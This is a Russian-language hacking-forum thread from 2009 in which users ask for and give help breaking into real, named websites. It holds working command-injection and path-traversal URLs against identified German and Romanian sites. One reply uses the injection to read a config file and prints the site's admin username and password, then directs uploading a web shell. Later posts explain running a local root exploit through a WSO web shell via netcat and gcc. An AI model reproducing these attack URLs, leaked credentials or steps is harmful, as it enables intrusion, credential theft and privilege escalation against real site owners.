01.07.2009, 18:44
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами:
9395645
Репутация:
7
|
|
Так я и грю, что таблицы не подобрать! а _members оставил чтобы инъект было видно!
information_schema не доступна. Просто может кто этот CMS Знает и таблицу юзеров подскажет?
Или какой другой вариант пробывать?
|
|
|
01.07.2009, 15:26
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
>>код я знаю как там найти
сотсавь регулярку и парсь.
|
|
|
|
01.07.2009, 23:19
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами:
8886744
Репутация:
-67
|
|
1.Здрасте. Короче вот http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
это выполнение команд на серве. я узнал что на серве есть PHP.
У меня есть шелл на народе.
Помогите залить шелл через выплнение команд. т.е. надо создать файл с расш. пхп и запусить? помогите плиз.
и подскажите дерикторию плиз в которой сайт лежит
ЗЫ деф. не буду. чесн слово.
2. Помогите заюзать InetCrack чтобы в данном логе осталась моя запись например PRIVET?
http://www.lohuis.ro/index.php?page=../../../../../../../../../../var/log/apache/error_log%00
Последний раз редактировалось nub-hacker; 02.07.2009 в 00:29..
|
|
|
|
02.07.2009, 01:01
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
Тэк.... Вообщем идём сюда :http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc= |cat%20../htdocs/admin/config.inc.php| там подглядываем такое:
Код:
$login["server"]="localhost";
$login["user"]=$DBUser;
$login["password"]=$DBPass;
$login["database"]="insotag";
$ftpuser=$login["user"];
$ftppass=$login["password"];
$ftpserver="www.insolvenzrechtstag.de";
$ftppfad="www/htdocs/pdfdoc";
$webpfad="../pdfdoc";
$adminuser="insotag";
$adminpass="hoersaal";
$admintemplate="../Templates/administration.dwt";
$erfassentemplate="../Templates/erfassen.dwt";
$bearbeitentemplate="../Templates/bearbeiten.dwt";
$loeschentemplate="../Templates/loeschen.dwt";
Отсюда видно, что $adminuser="insotag";
$adminpass="hoersaal";
Потом идём сюда: http://www.insolvenzrechtstag.de/admin/ вводим логин и пароль, проходим в http://www.insolvenzrechtstag.de/admin/index.php?modus=erfassen и заливаем шелл... так как я в немецком нини то... 
Последний раз редактировалось Ch3ck; 02.07.2009 в 01:26..
|
|
|
|
02.07.2009, 08:59
|
|
Новичок
Регистрация: 11.06.2008
Сообщений: 29
С нами:
9429617
Репутация:
11
|
|
Можно ли что-то сделать с этим запросом в скрипте
PHP код:
$row = mysql_query("INSERT INTO table (id,text) VALUES ('$id', '$text')");?
Допустим вставить свои данные в другую таблицу?
Переменные id и text никак не фильтруются, на сервере включены magic quotes, mysql 5. |
|
|
|
02.07.2009, 09:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от SeTM
Можно ли что-то сделать с этим запросом в скрипте
PHP код:
$row = mysql_query("INSERT INTO table (id,text) VALUES ('$id', '$text')");?
Допустим вставить свои данные в другую таблицу?
Переменные id и text никак не фильтруются, на сервере включены magic quotes, mysql 5. при включенных magic_quotes нельзя.
|
|
|
|
02.07.2009, 12:49
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами:
8886744
Репутация:
-67
|
|
Подскажите плиз. имеется WEB Shell на серваке. называется WSO2.
На милворе нашол сплоит на C под этот сервак. Как через вебшелл запустить этот сплоит?
http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29
add
// резервисты пришли, посмотрели и ушли 
Последний раз редактировалось nub-hacker; 02.07.2009 в 12:58..
|
|
|
|
02.07.2009, 13:07
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
nub-hacker
На форуме куча статей, по запуску сплоитов в том числе.
Будешь продолжать ничего не читая задавать вопросы и переносить сюда тему PHP инъекций с просьбой залить шелл , этот мультиакк тоже уйдёт в бан.
Мне даже в модцп не нужно лезть, что-бы понять кто ты.
|
|
|
|
02.07.2009, 13:08
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
Сообщение от nub-hacker
Подскажите плиз. имеется WEB Shell на серваке. называется WSO2.
На милворе нашол сплоит на C под этот сервак. Как через вебшелл запустить этот сплоит?
Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.
|
|
|
|
03.07.2009, 21:47
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами:
8886744
Репутация:
-67
|
|
Сообщение от nemaniak
Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.
помогите пожалуйста, уважаемые ачатовцы.
Есть сервак с линем Linux Kernel 2.6.29 и нанём shell WSO2.
Есть локальный сплоит для поднятия рута на С++.
http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29
Я кагбы новинький в сплоитах, плиз, напишити по конреней дейсвия для его запуска.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
